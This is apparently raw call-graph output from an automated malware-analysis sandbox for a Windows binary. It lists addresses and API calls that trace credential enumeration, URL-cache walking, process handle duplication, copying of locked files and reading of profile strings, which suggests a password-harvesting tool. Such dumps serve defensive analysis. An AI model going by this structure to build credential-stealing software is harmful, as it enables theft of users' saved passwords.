38244->38513 38253 445389 255 API calls 38245->38253 38254 445d71 38246->38254 38318 445d67 38246->38318 38248 445665 38626 40b1ab free free 38248->38626 38255 409d1f 6 API calls 38249->38255 38250->38164 38292 445b22 38250->38292 38259 445c17 38253->38259 38731 445093 23 API calls 38254->38731 38262 445e03 38255->38262 38257->38250 38258 4456d8 38264 40b2cc 27 API calls 38258->38264 38265 40b2cc 27 API calls 38259->38265 38261 44563c 38261->38248 38267 4087b3 337 API calls 38261->38267 38732 409b98 GetFileAttributesW 38262->38732 38263 40b6ef 249 API calls 38263->38195 38269 4456e2 38264->38269 38270 445c23 38265->38270 38266 445d83 38266->38195 38267->38261 38628 413fa6 _wcsicmp _wcsicmp 38269->38628 38274 409d1f 6 API calls 38270->38274 38272 445e12 38279 445e6b 38272->38279 38286 40b2cc 27 API calls 38272->38286 38277 445c37 38274->38277 38275 445aa1 38278 445b17 38275->38278 38295 445ab2 memset 38275->38295 38309 409d1f 6 API calls 38275->38309 38601 40add4 38275->38601 38606 445389 38275->38606 38615 40ae51 38275->38615 38276 4456eb 38282 4456fd memset memset memset memset 38276->38282 38283 4457ea 38276->38283 38284 445389 255 API calls 38277->38284 38707 40aebe 38278->38707 38734 445093 23 API calls 38279->38734 38629 409c70 wcscpy wcsrchr 38282->38629 38632 413d29 38283->38632 38291 445c47 38284->38291 38287 445e33 38286->38287 38293 409d1f 6 API calls 38287->38293 38289 445e7e 38294 445f67 38289->38294 38297 40b2cc 27 API calls 38291->38297 38292->38177 38292->38178 38298 445e47 38293->38298 38299 40b2cc 27 API calls 38294->38299 38300 40b2cc 27 API calls 38295->38300 38302 445c53 38297->38302 38733 409b98 GetFileAttributesW 38298->38733 38304 445f73 38299->38304 38300->38275 38301 409c70 2 API calls 38305 44577e 38301->38305 38306 409d1f 6 API calls 38302->38306 38308 409d1f 6 API calls 38304->38308 38310 409c70 2 API calls 38305->38310 38311 445c67 38306->38311 38307 445e56 38307->38279 38315 445e83 memset 38307->38315 38312 445f87 38308->38312 38309->38275 38313 44578d 38310->38313 38314 445389 255 API calls 38311->38314 38737 409b98 GetFileAttributesW 38312->38737 38313->38283 38320 40b2cc 27 API calls 38313->38320 38314->38177 38319 40b2cc 27 API calls 38315->38319 38318->38195 38318->38263 38321 445eab 38319->38321 38322 4457a8 38320->38322 38323 409d1f 6 API calls 38321->38323 38324 409d1f 6 API calls 38322->38324 38325 445ebf 38323->38325 38326 4457b8 38324->38326 38327 40ae18 9 API calls 38325->38327 38631 409b98 GetFileAttributesW 38326->38631 38337 445ef5 38327->38337 38329 4457c7 38329->38283 38330 4087b3 337 API calls 38329->38330 38330->38283 38331 40ae51 9 API calls 38331->38337 38332 445f5c 38333 40aebe FindClose 38332->38333 38333->38294 38334 40add4 2 API calls 38334->38337 38335 40b2cc 27 API calls 38335->38337 38336 409d1f 6 API calls 38336->38337 38337->38331 38337->38332 38337->38334 38337->38335 38337->38336 38339 445f3a 38337->38339 38735 409b98 GetFileAttributesW 38337->38735 38736 445093 23 API calls 38339->38736 38341->38138 38342->38141 38343->38138 38344->38133 38346 40c775 38345->38346 38738 40b1ab free free 38346->38738 38348 40c788 38739 40b1ab free free 38348->38739 38350 40c790 38740 40b1ab free free 38350->38740 38352 40c798 38353 40aa04 free 38352->38353 38354 40c7a0 38353->38354 38741 40c274 memset 38354->38741 38359 40a8ab 9 API calls 38360 40c7c3 38359->38360 38361 40a8ab 9 API calls 38360->38361 38362 40c7d0 38361->38362 38770 40c3c3 38362->38770 38366 40c877 38375 40bdb0 38366->38375 38367 40c86c 38796 4053fe 39 API calls 38367->38796 38370 40c813 _wcslwr 38794 40c634 49 API calls 38370->38794 38372 40c829 wcslen 38373 40c7e5 38372->38373 38373->38366 38373->38367 38793 40a706 wcslen memcpy 38373->38793 38795 40c634 49 API calls 38373->38795 38978 404363 38375->38978 38379 40bdee 38382 40b2cc 27 API calls 38379->38382 38384 40bf5d 38379->38384 38380 40bddf CredEnumerateW 38380->38379 38383 40be02 wcslen 38382->38383 38383->38384 38392 40be1e 38383->38392 38998 40440c 38384->38998 38385 40be26 wcsncmp 38385->38392 38388 40be7d memset 38389 40bea7 memcpy 38388->38389 38388->38392 38390 40bf11 wcschr 38389->38390 38389->38392 38390->38392 38391 40b2cc 27 API calls 38393 40bef6 _wcsnicmp 38391->38393 38392->38384 38392->38385 38392->38388 38392->38389 38392->38390 38392->38391 38394 40bf43 LocalFree 38392->38394 39001 40bd5d 28 API calls 38392->39001 39002 404423 38392->39002 38393->38390 38393->38392 38394->38392 38395 4135f7 39015 4135e0 38395->39015 38398 40b2cc 27 API calls 38399 41360d 38398->38399 38400 40a804 8 API calls 38399->38400 38401 413613 38400->38401 38402 41361b 38401->38402 38403 41363e 38401->38403 38405 40b273 27 API calls 38402->38405 38404 4135e0 FreeLibrary 38403->38404 38407 413643 38404->38407 38406 413625 GetProcAddress 38405->38406 38406->38403 38408 413648 38406->38408 38407->38168 38409 413658 38408->38409 38410 4135e0 FreeLibrary 38408->38410 38409->38168 38411 413666 38410->38411 38411->38168 39018 4449b9 38412->39018 38415 444c1f 38415->38148 38416 4449b9 42 API calls 38418 444b4b 38416->38418 38417 444c15 38420 4449b9 42 API calls 38417->38420 38418->38417 39039 444972 GetVersionExW 38418->39039 38420->38415 38421 444b99 memcmp 38426 444b8c 38421->38426 38422 444c0b 39043 444a85 42 API calls 38422->39043 38426->38421 38426->38422 39040 444aa5 42 API calls 38426->39040 39041 40a7a0 GetVersionExW 38426->39041 39042 444a85 42 API calls 38426->39042 38429 40399d 38428->38429 39044 403a16 38429->39044 38431 403a09 39058 40b1ab free free 38431->39058 38433 403a12 wcsrchr 38433->38155 38434 4039a3 38434->38431 38437 4039f4 38434->38437 39055 40a02c CreateFileW 38434->39055 38437->38431 38438 4099c6 2 API calls 38437->38438 38438->38431 38440 414c2e 14 API calls 38439->38440 38441 404048 38440->38441 38442 414c2e 14 API calls 38441->38442 38443 404056 38442->38443 38444 409d1f 6 API calls 38443->38444 38445 404073 38444->38445 38446 409d1f 6 API calls 38445->38446 38447 40408e 38446->38447 38448 409d1f 6 API calls 38447->38448 38449 4040a6 38448->38449 38450 403af5 20 API calls 38449->38450 38451 4040ba 38450->38451 38452 403af5 20 API calls 38451->38452 38453 4040cb 38452->38453 39085 40414f memset 38453->39085 38455 4040e0 38456 404140 38455->38456 38458 4040ec memset 38455->38458 38460 4099c6 2 API calls 38455->38460 38461 40a8ab 9 API calls 38455->38461 39099 40b1ab free free 38456->39099 38458->38455 38459 404148 38459->38215 38460->38455 38461->38455 39112 40a6e6 WideCharToMultiByte 38462->39112 38464 4087ed 39113 4095d9 memset 38464->39113 38467 408809 memset memset memset memset memset 38468 40b2cc 27 API calls 38467->38468 38469 4088a1 38468->38469 38470 409d1f 6 API calls 38469->38470 38471 4088b1 38470->38471 38472 40b2cc 27 API calls 38471->38472 38473 4088c0 38472->38473 38474 409d1f 6 API calls 38473->38474 38475 4088d0 38474->38475 38476 40b2cc 27 API calls 38475->38476 38477 4088df 38476->38477 38478 409d1f 6 API calls 38477->38478 38479 4088ef 38478->38479 38480 40b2cc 27 API calls 38479->38480 38481 4088fe 38480->38481 38482 409d1f 6 API calls 38481->38482 38483 40890e 38482->38483 38484 40b2cc 27 API calls 38483->38484 38485 40891d 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40892d 38486->38487 39132 409b98 GetFileAttributesW 38487->39132 38489 40893e 38490 408943 38489->38490 38491 408958 38489->38491 39133 407fdf 75 API calls 38490->39133 39134 409b98 GetFileAttributesW 38491->39134 38494 408964 38495 408969 38494->38495 38496 40897b 38494->38496 39135 4082c7 198 API calls 38495->39135 39136 409b98 GetFileAttributesW 38496->39136 38499 408987 38511 408953 38511->38215 38514 40b633 free 38513->38514 38515 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38514->38515 38516 413f00 Process32NextW 38515->38516 38517 413da5 OpenProcess 38516->38517 38518 413f17 CloseHandle 38516->38518 38519 413df3 memset 38517->38519 38522 413eb0 38517->38522 38518->38258 39402 413f27 38519->39402 38521 413ebf free 38521->38522 38522->38516 38522->38521 38523 4099f4 3 API calls 38522->38523 38523->38522 38524 413e37 GetModuleHandleW 38526 413e46 GetProcAddress 38524->38526 38527 413e1f 38524->38527 38526->38527 38527->38524 39407 413959 38527->39407 39423 413ca4 38527->39423 38529 413ea2 CloseHandle 38529->38522 38531 414c2e 14 API calls 38530->38531 38532 403eb7 38531->38532 38533 414c2e 14 API calls 38532->38533 38534 403ec5 38533->38534 38535 409d1f 6 API calls 38534->38535 38536 403ee2 38535->38536 38537 409d1f 6 API calls 38536->38537 38538 403efd 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 403f15 38539->38540 38541 403af5 20 API calls 38540->38541 38542 403f29 38541->38542 38543 403af5 20 API calls 38542->38543 38544 403f3a 38543->38544 38545 40414f 33 API calls 38544->38545 38546 403f4f 38545->38546 38547 403faf 38546->38547 38549 403f5b memset 38546->38549 38551 4099c6 2 API calls 38546->38551 38552 40a8ab 9 API calls 38546->38552 39437 40b1ab free free 38547->39437 38549->38546 38550 403fb7 38550->38198 38551->38546 38552->38546 38554 414c2e 14 API calls 38553->38554 38555 403d26 38554->38555 38556 414c2e 14 API calls 38555->38556 38557 403d34 38556->38557 38558 409d1f 6 API calls 38557->38558 38559 403d51 38558->38559 38560 409d1f 6 API calls 38559->38560 38561 403d6c 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 403d84 38562->38563 38564 403af5 20 API calls 38563->38564 38565 403d98 38564->38565 38566 403af5 20 API calls 38565->38566 38567 403da9 38566->38567 38568 40414f 33 API calls 38567->38568 38574 403dbe 38568->38574 38569 403e1e 39438 40b1ab free free 38569->39438 38570 403dca memset 38570->38574 38572 403e26 38572->38213 38573 4099c6 2 API calls 38573->38574 38574->38569 38574->38570 38574->38573 38575 40a8ab 9 API calls 38574->38575 38575->38574 38577 414b81 9 API calls 38576->38577 38578 414c40 38577->38578 38579 414c73 memset 38578->38579 39439 409cea 38578->39439 38583 414c94 38579->38583 38582 414c64 38582->38192 38584 414cf4 wcscpy 38583->38584 39442 414bb0 wcscpy 38583->39442 38584->38582 38586 414cd2 39443 4145ac RegQueryValueExW 38586->39443 38588 414ce9 38588->38584 38590 409d62 38589->38590 38591 409d43 wcscpy 38589->38591 38590->38235 38592 409719 2 API calls 38591->38592 38593 409d51 wcscat 38592->38593 38593->38590 38595 40aebe FindClose 38594->38595 38596 40ae21 38595->38596 38597 4099c6 2 API calls 38596->38597 38598 40ae35 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 40ae49 38599->38600 38600->38275 38602 40ade0 38601->38602 38603 40ae0f 38601->38603 38602->38603 38604 40ade7 wcscmp 38602->38604 38603->38275 38604->38603 38605 40adfe wcscmp 38604->38605 38605->38603 38607 40ae18 9 API calls 38606->38607 38609 4453c4 38607->38609 38608 40ae51 9 API calls 38608->38609 38609->38608 38610 4453f3 38609->38610 38611 40add4 2 API calls 38609->38611 38614 445403 250 API calls 38609->38614 38612 40aebe FindClose 38610->38612 38611->38609 38613 4453fe 38612->38613 38613->38275 38614->38609 38616 40ae7b FindNextFileW 38615->38616 38617 40ae5c FindFirstFileW 38615->38617 38618 40ae94 38616->38618 38619 40ae8f 38616->38619 38617->38618 38621 40aeb6 38618->38621 38622 409d1f 6 API calls 38618->38622 38620 40aebe FindClose 38619->38620 38620->38618 38621->38275 38622->38621 38623->38187 38624->38167 38625->38261 38626->38244 38627->38244 38628->38276 38630 409c89 38629->38630 38630->38301 38631->38329 38633 413d39 38632->38633 38634 413d2f FreeLibrary 38632->38634 38635 40b633 free 38633->38635 38634->38633 38636 413d42 38635->38636 38637 40b633 free 38636->38637 38638 413d4a 38637->38638 38638->38157 38639->38160 38640->38205 38641->38228 38643 44db70 38642->38643 38644 40b6fc memset 38643->38644 38645 409c70 2 API calls 38644->38645 38646 40b732 wcsrchr 38645->38646 38647 40b743 38646->38647 38648 40b746 memset 38646->38648 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 40b76f 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 40b783 38651->38652 39444 409b98 GetFileAttributesW 38652->39444 38654 40b792 38655 40b7c2 38654->38655 38657 409c70 2 API calls 38654->38657 39445 40bb98 38655->39445 38659 40b7a5 38657->38659 38660 40b2cc 27 API calls 38659->38660 38663 40b7b2 38660->38663 38661 40b837 CloseHandle 38665 40b83e memset 38661->38665 38662 40b817 39479 409a45 GetTempPathW 38662->39479 38666 409d1f 6 API calls 38663->38666 39478 40a6e6 WideCharToMultiByte 38665->39478 38666->38655 38667 40b827 38667->38665 38669 40b866 38670 444432 120 API calls 38669->38670 38671 40b879 38670->38671 38672 40b273 27 API calls 38671->38672 38673 40bad5 38671->38673 38674 40b89a 38672->38674 38675 40b04b ??3@YAXPAX 38673->38675 38676 438552 133 API calls 38674->38676 38677 40baf3 38675->38677 38678 40b8a4 38676->38678 38677->38238 38679 40bacd 38678->38679 38681 4251c4 136 API calls 38678->38681 38680 443d90 110 API calls 38679->38680 38680->38673 38704 40b8b8 38681->38704 38682 40bac6 39491 424f26 122 API calls 38682->39491 38683 40b8bd memset 39482 425413 17 API calls 38683->39482 38686 425413 17 API calls 38686->38704 38689 40a71b MultiByteToWideChar 38689->38704 38690 40a734 MultiByteToWideChar 38690->38704 38693 40b9b5 memcmp 38693->38704 38694 4099c6 2 API calls 38694->38704 38695 404423 37 API calls 38695->38704 38698 4251c4 136 API calls 38698->38704 38699 40bb3e memset memcpy 39492 40a734 MultiByteToWideChar 38699->39492 38701 40bb88 LocalFree 38701->38704 38704->38682 38704->38683 38704->38686 38704->38689 38704->38690 38704->38693 38704->38694 38704->38695 38704->38698 38704->38699 38705 40ba5f memcmp 38704->38705 39483 4253ef 16 API calls 38704->39483 39484 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38704->39484 39485 4253af 17 API calls 38704->39485 39486 4253cf 17 API calls 38704->39486 39487 447280 memset 38704->39487 39488 447960 memset memcpy memcpy memcpy 38704->39488 39489 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38704->39489 39490 447920 memcpy memcpy memcpy 38704->39490 38705->38704 38706->38240 38708 40aed1 38707->38708 38709 40aec7 FindClose 38707->38709 38708->38292 38709->38708 38711 4099d7 38710->38711 38712 4099da memcpy 38710->38712 38711->38712 38712->38214 38714 40b2cc 27 API calls 38713->38714 38715 44543f 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 44544f 38716->38717 39584 409b98 GetFileAttributesW 38717->39584 38719 44545e 38720 445476 38719->38720 38722 40b6ef 249 API calls 38719->38722 38721 40b2cc 27 API calls 38720->38721 38723 445482 38721->38723 38722->38720 38724 409d1f 6 API calls 38723->38724 38725 445492 38724->38725 39585 409b98 GetFileAttributesW 38725->39585 38727 4454a1 38728 4454b9 38727->38728 38729 40b6ef 249 API calls 38727->38729 38728->38242 38729->38728 38730->38241 38731->38266 38732->38272 38733->38307 38734->38289 38735->38337 38736->38337 38737->38318 38738->38348 38739->38350 38740->38352 38742 414c2e 14 API calls 38741->38742 38743 40c2ae 38742->38743 38797 40c1d3 38743->38797 38748 40c3be 38765 40a8ab 38748->38765 38749 40afcf 2 API calls 38750 40c2fd FindFirstUrlCacheEntryW 38749->38750 38751 40c3b6 38750->38751 38752 40c31e wcschr 38750->38752 38753 40b04b ??3@YAXPAX 38751->38753 38754 40c331 38752->38754 38755 40c35e FindNextUrlCacheEntryW 38752->38755 38753->38748 38757 40a8ab 9 API calls 38754->38757 38755->38752 38756 40c373 GetLastError 38755->38756 38758 40c3ad FindCloseUrlCache 38756->38758 38759 40c37e 38756->38759 38760 40c33e wcschr 38757->38760 38758->38751 38761 40afcf 2 API calls 38759->38761 38760->38755 38762 40c34f 38760->38762 38764 40c391 FindNextUrlCacheEntryW 38761->38764 38763 40a8ab 9 API calls 38762->38763 38763->38755 38764->38752 38764->38758 38913 40a97a 38765->38913 38768 40a8cc 38768->38359 38769 40a8d0 7 API calls 38769->38768 38918 40b1ab free free 38770->38918 38772 40c3dd 38773 40b2cc 27 API calls 38772->38773 38774 40c3e7 38773->38774 38775 40c50e 38774->38775 38776 40c3ff 38774->38776 38790 405337 38775->38790 38777 40a9ce 4 API calls 38776->38777 38778 40c418 memset 38777->38778 38919 40aa1d 38778->38919 38781 40c471 38783 40c47a _wcsupr 38781->38783 38782 40c505 38782->38775 38784 40a8d0 7 API calls 38783->38784 38785 40c498 38784->38785 38786 40a8d0 7 API calls 38785->38786 38787 40c4ac memset 38786->38787 38788 40aa1d 38787->38788 38789 40c4e4 RegEnumValueW 38788->38789 38789->38782 38789->38783 38921 405220 38790->38921 38793->38370 38794->38372 38795->38373 38796->38366 38798 40ae18 9 API calls 38797->38798 38804 40c210 38798->38804 38799 40ae51 9 API calls 38799->38804 38800 40c264 38801 40aebe FindClose 38800->38801 38803 40c26f 38801->38803 38802 40add4 2 API calls 38802->38804 38809 40e5ed memset memset 38803->38809 38804->38799 38804->38800 38804->38802 38805 40c231 _wcsicmp 38804->38805 38807 40c1d3 34 API calls 38804->38807 38805->38804 38806 40c248 38805->38806 38822 40c084 21 API calls 38806->38822 38807->38804 38810 414c2e 14 API calls 38809->38810 38811 40e63f 38810->38811 38812 409d1f 6 API calls 38811->38812 38813 40e658 38812->38813 38823 409b98 GetFileAttributesW 38813->38823 38815 40e667 38816 409d1f 6 API calls 38815->38816 38818 40e680 38815->38818 38816->38818 38824 409b98 GetFileAttributesW 38818->38824 38819 40e68f 38820 40c2d8 38819->38820 38825 40e4b2 38819->38825 38820->38748 38820->38749 38822->38804 38823->38815 38824->38819 38846 40e01e 38825->38846 38827 40e593 38828 40e5b0 38827->38828 38829 40e59c DeleteFileW 38827->38829 38830 40b04b ??3@YAXPAX 38828->38830 38829->38828 38832 40e5bb 38830->38832 38831 40e521 38831->38827 38869 40e175 38831->38869 38834 40e5c4 CloseHandle 38832->38834 38835 40e5cc 38832->38835 38834->38835 38836 40b633 free 38835->38836 38838 40e5db 38836->38838 38837 40e573 38839 40e584 38837->38839 38840 40e57c CloseHandle 38837->38840 38842 40b633 free 38838->38842 38912 40b1ab free free 38839->38912 38840->38839 38841 40e540 38841->38837 38889 40e2ab 38841->38889 38844 40e5e3 38842->38844 38844->38820 38847 406214 22 API calls 38846->38847 38848 40e03c 38847->38848 38849 40e16b 38848->38849 38850 40dd85 74 API calls 38848->38850 38849->38831 38851 40e06b 38850->38851 38851->38849 38852 40afcf ??2@YAPAXI ??3@YAXPAX 38851->38852 38853 40e08d OpenProcess 38852->38853 38854 40e0a4 GetCurrentProcess DuplicateHandle 38853->38854 38858 40e152 38853->38858 38855 40e0d0 GetFileSize 38854->38855 38856 40e14a CloseHandle 38854->38856 38859 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38855->38859 38856->38858 38857 40e160 38861 40b04b ??3@YAXPAX 38857->38861 38858->38857 38860 406214 22 API calls 38858->38860 38862 40e0ea 38859->38862 38860->38857 38861->38849 38863 4096dc CreateFileW 38862->38863 38864 40e0f1 CreateFileMappingW 38863->38864 38865 40e140 CloseHandle CloseHandle 38864->38865 38866 40e10b MapViewOfFile 38864->38866 38865->38856 38867 40e13b CloseHandle 38866->38867 38868 40e11f WriteFile UnmapViewOfFile 38866->38868 38867->38865 38868->38867 38870 40e18c 38869->38870 38871 406b90 11 API calls 38870->38871 38872 40e19f 38871->38872 38873 40e1a7 memset 38872->38873 38874 40e299 38872->38874 38879 40e1e8 38873->38879 38875 4069a3 ??3@YAXPAX free 38874->38875 38876 40e2a4 38875->38876 38876->38841 38877 406e8f 13 API calls 38877->38879 38878 406b53 SetFilePointerEx ReadFile 38878->38879 38879->38877 38879->38878 38880 40e283 38879->38880 38881 40dd50 _wcsicmp 38879->38881 38885 40742e 8 API calls 38879->38885 38886 40aae3 wcslen wcslen _memicmp 38879->38886 38887 40e244 _snwprintf 38879->38887 38882 40e291 38880->38882 38883 40e288 free 38880->38883 38881->38879 38884 40aa04 free 38882->38884 38883->38882 38884->38874 38885->38879 38886->38879 38888 40a8d0 7 API calls 38887->38888 38888->38879 38890 40e2c2 38889->38890 38891 406b90 11 API calls 38890->38891 38897 40e2d3 38891->38897 38892 40e4a0 38893 4069a3 ??3@YAXPAX free 38892->38893 38895 40e4ab 38893->38895 38894 406e8f 13 API calls 38894->38897 38895->38841 38896 406b53 SetFilePointerEx ReadFile 38896->38897 38897->38892 38897->38894 38897->38896 38898 40e489 38897->38898 38901 40dd50 _wcsicmp 38897->38901 38903 40dd50 _wcsicmp 38897->38903 38906 40742e 8 API calls 38897->38906 38907 40e3e0 memcpy 38897->38907 38908 40e3fb memcpy 38897->38908 38909 40e3b3 wcschr 38897->38909 38910 40e416 memcpy 38897->38910 38911 40e431 memcpy 38897->38911 38899 40aa04 free 38898->38899 38900 40e491 38899->38900 38900->38892 38902 40e497 free 38900->38902 38901->38897 38902->38892 38904 40e376 memset 38903->38904 38905 40aa29 6 API calls 38904->38905 38905->38897 38906->38897 38907->38897 38908->38897 38909->38897 38910->38897 38911->38897 38912->38827 38914 40a980 38913->38914 38915 40a995 _wcsicmp 38914->38915 38916 40a99c wcscmp 38914->38916 38917 40a8bb 38914->38917 38915->38914 38916->38914 38917->38768 38917->38769 38918->38772 38920 40aa23 RegEnumValueW 38919->38920 38920->38781 38920->38782 38922 405335 38921->38922 38923 40522a 38921->38923 38922->38373 38924 40b2cc 27 API calls 38923->38924 38925 405234 38924->38925 38926 40a804 8 API calls 38925->38926 38927 40523a 38926->38927 38966 40b273 38927->38966 38929 405248 _mbscpy _mbscat GetProcAddress 38930 40b273 27 API calls 38929->38930 38931 405279 38930->38931 38969 405211 GetProcAddress 38931->38969 38933 405282 38934 40b273 27 API calls 38933->38934 38935 40528f 38934->38935 38970 405211 GetProcAddress 38935->38970 38937 405298 38938 40b273 27 API calls 38937->38938 38939 4052a5 38938->38939 38971 405211 GetProcAddress 38939->38971 38941 4052ae 38942 40b273 27 API calls 38941->38942 38943 4052bb 38942->38943 38972 405211 GetProcAddress 38943->38972 38945 4052c4 38946 40b273 27 API calls 38945->38946 38947 4052d1 38946->38947 38973 405211 GetProcAddress 38947->38973 38949 4052da 38950 40b273 27 API calls 38949->38950 38951 4052e7 38950->38951 38974 405211 GetProcAddress 38951->38974 38953 4052f0 38954 40b273 27 API calls 38953->38954 38955 4052fd 38954->38955 38975 405211 GetProcAddress 38955->38975 38957 405306 38958 40b273 27 API calls 38957->38958 38959 405313 38958->38959 38976 405211 GetProcAddress 38959->38976 38961 40531c 38962 40b273 27 API calls 38961->38962 38963 405329 38962->38963 38977 405211 GetProcAddress 38963->38977 38965 405332 38965->38922 38967 40b58d 27 API calls 38966->38967 38968 40b18c 38967->38968 38968->38929 38969->38933 38970->38937 38971->38941 38972->38945 38973->38949 38974->38953 38975->38957 38976->38961 38977->38965 38979 40440c FreeLibrary 38978->38979 38980 40436d 38979->38980 38981 40a804 8 API calls 38980->38981 38982 404377 38981->38982 38983 404383 38982->38983 38984 404405 38982->38984 38985 40b273 27 API calls 38983->38985 38984->38379 38984->38380 38984->38384 38986 40438d GetProcAddress 38985->38986 38987 40b273 27 API calls 38986->38987 38988 4043a7 GetProcAddress 38987->38988 38989 40b273 27 API calls 38988->38989 38990 4043ba GetProcAddress 38989->38990 38991 40b273 27 API calls 38990->38991 38992 4043ce GetProcAddress 38991->38992 38993 40b273 27 API calls 38992->38993 38994 4043e2 GetProcAddress 38993->38994 38995 4043f1 38994->38995 38996 4043f7 38995->38996 38997 40440c FreeLibrary 38995->38997 38996->38984 38997->38984 38999 404413 FreeLibrary 38998->38999 39000 40441e 38998->39000 38999->39000 39000->38395 39001->38392 39003 40447e 39002->39003 39004 40442e 39002->39004 39003->38392 39005 40b2cc 27 API calls 39004->39005 39006 404438 39005->39006 39007 40a804 8 API calls 39006->39007 39008 40443e 39007->39008 39009 404445 39008->39009 39010 404467 39008->39010 39011 40b273 27 API calls 39009->39011 39010->39003 39013 404475 FreeLibrary 39010->39013 39012 40444f GetProcAddress 39011->39012 39012->39010 39014 404460 39012->39014 39013->39003 39014->39010 39016 4135f6 39015->39016 39017 4135eb FreeLibrary 39015->39017 39016->38398 39017->39016 39019 4449c4 39018->39019 39020 444a52 39018->39020 39021 40b2cc 27 API calls 39019->39021 39020->38415 39020->38416 39022 4449cb 39021->39022 39023 40a804 8 API calls 39022->39023 39024 4449d1 39023->39024 39025 40b273 27 API calls 39024->39025 39026 4449dc GetProcAddress 39025->39026 39027 40b273 27 API calls 39026->39027 39028 4449f3 GetProcAddress 39027->39028 39029 40b273 27 API calls 39028->39029 39030 444a04 GetProcAddress 39029->39030 39031 40b273 27 API calls 39030->39031 39032 444a15 GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 444a26 GetProcAddress 39033->39034 39035 40b273 27 API calls 39034->39035 39036 444a37 GetProcAddress 39035->39036 39037 40b273 27 API calls 39036->39037 39038 444a48 GetProcAddress 39037->39038 39038->39020 39039->38426 39040->38426 39041->38426 39042->38426 39043->38417 39045 403a29 39044->39045 39059 403bed memset memset 39045->39059 39047 403ae7 39072 40b1ab free free 39047->39072 39048 403a3f memset 39052 403a2f 39048->39052 39050 403aef 39050->38434 39051 409d1f 6 API calls 39051->39052 39052->39047 39052->39048 39052->39051 39053 409b98 GetFileAttributesW 39052->39053 39054 40a8d0 7 API calls 39052->39054 39053->39052 39054->39052 39056 40a051 GetFileTime CloseHandle 39055->39056 39057 4039ca CompareFileTime 39055->39057 39056->39057 39057->38434 39058->38433 39060 414c2e 14 API calls 39059->39060 39061 403c38 39060->39061 39062 409719 2 API calls 39061->39062 39063 403c3f wcscat 39062->39063 39064 414c2e 14 API calls 39063->39064 39065 403c61 39064->39065 39066 409719 2 API calls 39065->39066 39067 403c68 wcscat 39066->39067 39073 403af5 39067->39073 39070 403af5 20 API calls 39071 403c95 39070->39071 39071->39052 39072->39050 39074 403b02 39073->39074 39075 40ae18 9 API calls 39074->39075 39084 403b37 39075->39084 39076 403bdb 39078 40aebe FindClose 39076->39078 39077 40add4 wcscmp wcscmp 39077->39084 39079 403be6 39078->39079 39079->39070 39080 40a8d0 7 API calls 39080->39084 39081 40ae18 9 API calls 39081->39084 39082 40ae51 9 API calls 39082->39084 39083 40aebe FindClose 39083->39084 39084->39076 39084->39077 39084->39080 39084->39081 39084->39082 39084->39083 39086 409d1f 6 API calls 39085->39086 39087 404190 39086->39087 39100 409b98 GetFileAttributesW 39087->39100 39089 40419c 39090 4041a7 6 API calls 39089->39090 39091 40435c 39089->39091 39092 40424f 39090->39092 39091->38455 39092->39091 39094 40425e memset 39092->39094 39096 409d1f 6 API calls 39092->39096 39097 40a8ab 9 API calls 39092->39097 39101 414842 39092->39101 39094->39092 39095 404296 wcscpy 39094->39095 39095->39092 39096->39092 39098 4042b6 memset memset _snwprintf wcscpy 39097->39098 39098->39092 39099->38459 39100->39089 39104 41443e 39101->39104 39103 414866 39103->39092 39105 41444b 39104->39105 39106 414451 39105->39106 39107 4144a3 GetPrivateProfileStringW 39105->39107 39108 414491 39106->39108 39109 414455 wcschr 39106->39109 39107->39103 39111 414495 WritePrivateProfileStringW 39108->39111 39109->39108 39110 414463 _snwprintf 39109->39110 39110->39111 39111->39103 39112->38464 39114 40b2cc 27 API calls 39113->39114 39115 409615 39114->39115 39116 409d1f 6 API calls 39115->39116 39117 409625 39116->39117 39142 409b98 GetFileAttributesW 39117->39142 39119 409634 39120 409648 39119->39120 39143 4091b8 memset 39119->39143 39122 40b2cc 27 API calls 39120->39122 39124 408801 39120->39124 39123 40965d 39122->39123 39125 409d1f 6 API calls 39123->39125 39124->38467 39124->38511 39126 40966d 39125->39126 39195 409b98 GetFileAttributesW 39126->39195 39128 40967c 39128->39124 39129 409681 39128->39129 39196 409529 72 API calls 39129->39196 39131 409690 39131->39124 39132->38489 39133->38511 39134->38494 39135->38511 39136->38499 39142->39119 39197 40a6e6 WideCharToMultiByte 39143->39197 39145 409202 39198 444432 39145->39198 39148 40b273 27 API calls 39149 409236 39148->39149 39244 438552 39149->39244 39152 409383 39154 40b273 27 API calls 39152->39154 39155 409399 39154->39155 39158 438552 133 API calls 39155->39158 39156 40937b 39269 424f26 122 API calls 39156->39269 39157 409254 39157->39156 39265 4253cf 17 API calls 39157->39265 39177 4093a3 39158->39177 39161 4094ff 39273 443d90 39161->39273 39162 409267 39266 4253cf 17 API calls 39162->39266 39165 4251c4 136 API calls 39165->39177 39167 409507 39174 40951d 39167->39174 39293 408f2f 77 API calls 39167->39293 39169 4093df 39272 424f26 122 API calls 39169->39272 39171 4253cf 17 API calls 39171->39177 39174->39120 39177->39161 39177->39165 39177->39169 39177->39171 39179 4093e4 39177->39179 39270 4253af 17 API calls 39179->39270 39185 4093ed 39271 4253af 17 API calls 39185->39271 39188 4093f9 39188->39169 39189 409409 memcmp 39188->39189 39189->39169 39190 409421 memcmp 39189->39190 39191 4094a4 memcmp 39190->39191 39192 409435 39190->39192 39191->39169 39192->39169 39195->39128 39196->39131 39197->39145 39294 4438b5 39198->39294 39200 44444c 39206 409215 39200->39206 39308 415a6d 39200->39308 39203 444486 39205 4444b9 memcpy 39203->39205 39243 4444a4 39203->39243 39204 44469e 39204->39206 39207 443d90 110 API calls 39204->39207 39312 415258 39205->39312 39206->39148 39206->39174 39207->39206 39209 444524 39210 444541 39209->39210 39211 44452a 39209->39211 39315 444316 39210->39315 39349 416935 39211->39349 39215 444316 18 API calls 39216 444563 39215->39216 39217 444316 18 API calls 39216->39217 39218 44456f 39217->39218 39219 444316 18 API calls 39218->39219 39220 44457f 39219->39220 39220->39243 39329 432d4e 39220->39329 39223 444316 18 API calls 39362 4442e6 11 API calls 